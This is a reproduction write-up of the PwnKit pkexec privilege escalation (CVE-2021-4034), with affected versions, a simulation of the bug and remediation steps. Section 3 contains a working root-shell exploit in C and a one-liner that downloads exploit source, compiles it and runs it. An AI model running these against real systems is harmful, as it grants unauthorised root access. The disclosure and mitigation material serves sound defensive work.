Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034, "PwnKit") Reproduction
This article reproduces the polkit (pkexec) vulnerability disclosed in January 2022. It is a local privilege escalation, not remote code execution: when the setuid-root pkexec is executed with an empty argument list (argc == 0), it reads argv[1], which is in fact envp[0], resolves that string through PATH and writes the resolved path back into the environment. An unprivileged local user can use this to inject a GCONV_PATH variable and have pkexec load an attacker-supplied shared library as root.

1. Affected scope
The vast majority of Linux distributions are affected. Check the installed polkit version:

CentOS: rpm -qa | grep "polkit"
Ubuntu: dpkg -l policykit-1

2. Prerequisites

- a working directory in which the local user can create and execute files (the PoC writes GCONV_PATH=./pwnkit and pwnkit/pwnkit.so into the current directory)
- gcc on the target, ideally; this PoC shells out to gcc at runtime to build pwnkit.so, so without it you must build on a machine with the same versions and copy the result over

3. Reproduction

3.1 PoC

```c
/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit's pkexec (CVE-2021-4034) by Andris Raugulis
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Source of the helper library. pkexec loads it as a gconv module through the
 * injected GCONV_PATH, and gconv_init() then runs with root privileges. */
char *shell =
    "#include <stdio.h>\n"
    "#include <stdlib.h>\n"
    "#include <unistd.h>\n\n"
    "void gconv() {}\n"
    "void gconv_init() {\n"
    "    setuid(0); setgid(0);\n"
    "    seteuid(0); setegid(0);\n"
    "    system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
    "    exit(0);\n"
    "}";

int main(int argc, char *argv[]) {
    FILE *fp;
    /* A directory literally named "GCONV_PATH=." holding an executable "pwnkit":
     * pkexec resolves argv[1] ("pwnkit") against PATH=GCONV_PATH=. and writes
     * "GCONV_PATH=./pwnkit" back into envp[0], which sets GCONV_PATH. */
    system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
    /* gconv-modules maps the charset PWNKIT (selected via CHARSET) to pwnkit.so */
    system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
    fp = fopen("pwnkit/pwnkit.c", "w");
    fprintf(fp, "%s", shell);
    fclose(fp);
    system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
    /* Empty argv (argc == 0): inside pkexec, argv[1] is envp[0] == "pwnkit". */
    char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
    execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
```
Usage: compile with gcc and run the resulting binary.

3.2 Quick exploitation
Run the following directly:

```shell
wget https://ghproxy.com/https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c && gcc cve-2021-4034-poc.c -o cve-2021-4034-poc && ./cve-2021-4034-poc
```

3.3 Result
After running the command above, if the vulnerability has not been patched you drop straight into a root shell (the /bin/sh spawned from gconv_init(); `id` shows uid=0). The PoC also removes the GCONV_PATH=. and pwnkit directories it created.
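Why this works, as an added example that is not part of the original post or of the arthepsy PoC: the C program below re-implements, in miniature and under names of our own (find_in_path, vulnerable_pkexec_resolve, fixed_pkexec_resolve, run_demo), the argument handling of the pre-fix pkexec, on memory laid out the way execve("/usr/bin/pkexec", (char*[]){NULL}, env) hands it to the program. It shows envp[0] being rewritten from "pwnkit" to "GCONV_PATH=./pwnkit", and the upstream patch's early exit on argc < 1 preventing that. Nothing here executes pkexec.

```c
/* Added example: user-space simulation of the argv/envp aliasing behind
 * PwnKit. The vulnerable logic is re-implemented in miniature; all names
 * are ours, not polkit's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Resolve `prog` against a colon-separated PATH list, returning a malloc'd
 * "dir/prog" for the first non-empty entry. Simplification: the real
 * g_find_program_in_path() also checks that the file exists and is
 * executable, which the PoC guarantees with touch + chmod a+x. */
static char *find_in_path(const char *prog, const char *path_list) {
    const char *start = path_list;
    for (;;) {
        const char *end = strchr(start, ':');
        size_t len = end ? (size_t)(end - start) : strlen(start);
        if (len > 0) {
            char *out = malloc(len + 1 + strlen(prog) + 1);
            if (out == NULL) return NULL;
            memcpy(out, start, len);
            out[len] = '/';
            strcpy(out + len + 1, prog);
            return out;
        }
        if (end == NULL) return NULL;
        start = end + 1;
    }
}

/* Miniature of the pre-fix pkexec main(): the option loop starts at n = 1
 * and runs zero times when argc == 0, after which argv[n] is read with
 * n == 1 regardless of argc. A non-absolute argv[n] is replaced by its
 * PATH-resolved form, so both the read and the write land on the pointer
 * that follows argv's terminating NULL in memory: envp[0]. */
static const char *vulnerable_pkexec_resolve(int argc, char **argv, char **envp) {
    int n = 1;
    while (n < argc && argv[n][0] == '-') n++;   /* zero iterations here */
    const char *path = argv[n];                  /* out-of-bounds read */
    if (path == NULL) return NULL;
    if (path[0] != '/') {
        const char *path_env = "";
        for (char **e = envp; *e != NULL; e++)
            if (strncmp(*e, "PATH=", 5) == 0) path_env = *e + 5;
        char *resolved = find_in_path(path, path_env);
        if (resolved != NULL) argv[n] = resolved;   /* out-of-bounds write: envp[0] */
    }
    return envp[0];
}

/* Same logic behind the upstream patch, which exits early on an empty argv. */
static const char *fixed_pkexec_resolve(int argc, char **argv, char **envp) {
    if (argc < 1) return NULL;                   /* real pkexec exits with 127 */
    return vulnerable_pkexec_resolve(argc, argv, envp);
}

typedef const char *(*resolver_fn)(int, char **, char **);

/* Constructed layout matching execve("/usr/bin/pkexec", (char*[]){NULL}, env):
 * the kernel places envp immediately after argv's terminating NULL, so
 * argv[1] and envp[0] are the same slot. Returns envp[0] after resolution. */
static const char *run_demo(resolver_fn resolve) {
    static char *slots[6];
    slots[0] = NULL;                  /* argv[0] == NULL, argc == 0 */
    slots[1] = "pwnkit";              /* envp[0], also reachable as argv[1] */
    slots[2] = "PATH=GCONV_PATH=.";   /* the directory the PoC creates */
    slots[3] = "CHARSET=PWNKIT";
    slots[4] = "SHELL=pwnkit";
    slots[5] = NULL;
    char **argv = slots;
    char **envp = slots + 1;
    resolve(0, argv, envp);
    return envp[0];
}

int main(void) {
    printf("vulnerable: envp[0] becomes \"%s\"\n", run_demo(vulnerable_pkexec_resolve));
    printf("fixed:      envp[0] stays   \"%s\"\n", run_demo(fixed_pkexec_resolve));
    return 0;
}
```

Once envp[0] reads GCONV_PATH=./pwnkit, the later iconv_open() call that pkexec makes to print an error message in the CHARSET=PWNKIT locale loads pwnkit/pwnkit.so as a gconv module, which is the root-privileged code execution the PoC's gconv_init() provides.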
4. Fix

4.1 Fixed versions
CentOS:
- CentOS 6: polkit-0.96-11.el6_10.2
- CentOS 7: polkit-0.112-26.el7_9.1
- CentOS 8.0: polkit-0.115-13.el8_5.1
- CentOS 8.2: polkit-0.115-11.el8_2.2
- CentOS 8.4: polkit-0.115-11.el8_4.2
Ubuntu:
- Ubuntu 20.04 LTS: policykit-1 0.105-26ubuntu1.2
- Ubuntu 18.04 LTS: policykit-1 0.105-20ubuntu0.18.04.6
- Ubuntu 16.04 ESM: policykit-1 0.105-14.1ubuntu0.5+esm1
- Ubuntu 14.04 ESM: policykit-1 0.105-4ubuntu3.14.04.6+esm1
4.2 Remediation

4.2.1 Permission restriction (remove the setuid bit)
Note: this is the recommended approach; it has almost no impact on running services.

1. Change the permissions of pkexec: chmod 0755 /usr/bin/pkexec. This drops the setuid bit, so pkexec runs as the invoking user and the bug can no longer escalate privileges. Verify with ls -l /usr/bin/pkexec: the mode should read -rwxr-xr-x rather than -rwsr-xr-x.
2. If pkexec is not needed, temporarily delete the executable.

4.2.2 Version upgrade
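The check and the mitigation from 4.2.1 in one program, as an added example that is not from the original post: the functions below (pkexec_suid_state, strip_suid and demo_on_tempfile are our own names) report whether /usr/bin/pkexec still carries the setuid bit, apply the chmod 0755 mitigation, and confirm the bit is gone. The demo runs the before/after sequence on a throwaway file in /tmp (or $TMPDIR) so it works unprivileged; applying strip_suid to the real pkexec needs root, exactly like the chmod in the post.

```c
/* Added example: detect and remove the setuid bit on pkexec. Names and the
 * throwaway-file demo are ours, not part of the original post. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* 1 if `path` exists and has the setuid bit (the state an unpatched pkexec
 * ships in), 0 if it exists without it, -1 if it cannot be stat'ed (for
 * example because pkexec was deleted, the post's second option). */
int pkexec_suid_state(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* The post's mitigation: chmod 0755. Returns 0 when the file ends up without
 * setuid (also when it already was), -1 if chmod failed or the bit persists. */
int strip_suid(const char *path) {
    if (chmod(path, 0755) != 0) return -1;
    return pkexec_suid_state(path) == 0 ? 0 : -1;
}

/* Human-readable verdict for a state returned by pkexec_suid_state(). */
const char *describe_state(int state) {
    if (state < 0) return "pkexec not present: nothing to mitigate";
    if (state == 0) return "pkexec is not setuid: PwnKit cannot escalate through it";
    return "pkexec is setuid: vulnerable unless polkit is at a fixed version";
}

/* Self-contained before/after run on a constructed temp file: mode 4755 like
 * a distro-installed pkexec, then the mitigation. Returns 1 on success. */
int demo_on_tempfile(void) {
    const char *dir = getenv("TMPDIR");
    char tmpl[512];
    snprintf(tmpl, sizeof tmpl, "%s/pkexec-demo-XXXXXX", dir ? dir : "/tmp");
    int fd = mkstemp(tmpl);
    if (fd < 0) return 0;
    close(fd);
    int ok = chmod(tmpl, 04755) == 0
          && pkexec_suid_state(tmpl) == 1
          && strip_suid(tmpl) == 0
          && pkexec_suid_state(tmpl) == 0;
    unlink(tmpl);
    return ok;
}

int main(void) {
    puts(describe_state(pkexec_suid_state("/usr/bin/pkexec")));
    return demo_on_tempfile() ? 0 : 1;
}
```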
Note: the upgrade restarts polkit, which can leave container services such as docker and k8s unreachable until they are restarted after the update. If a service cannot be restarted, use the permission restriction method instead. After upgrading, confirm that polkit is actually at one of the fixed versions listed in 4.1 (rerun the check from section 1); some yum repositories had not yet published the fixed build.

CentOS: yum -y install polkit
Ubuntu: apt-get install policykit-1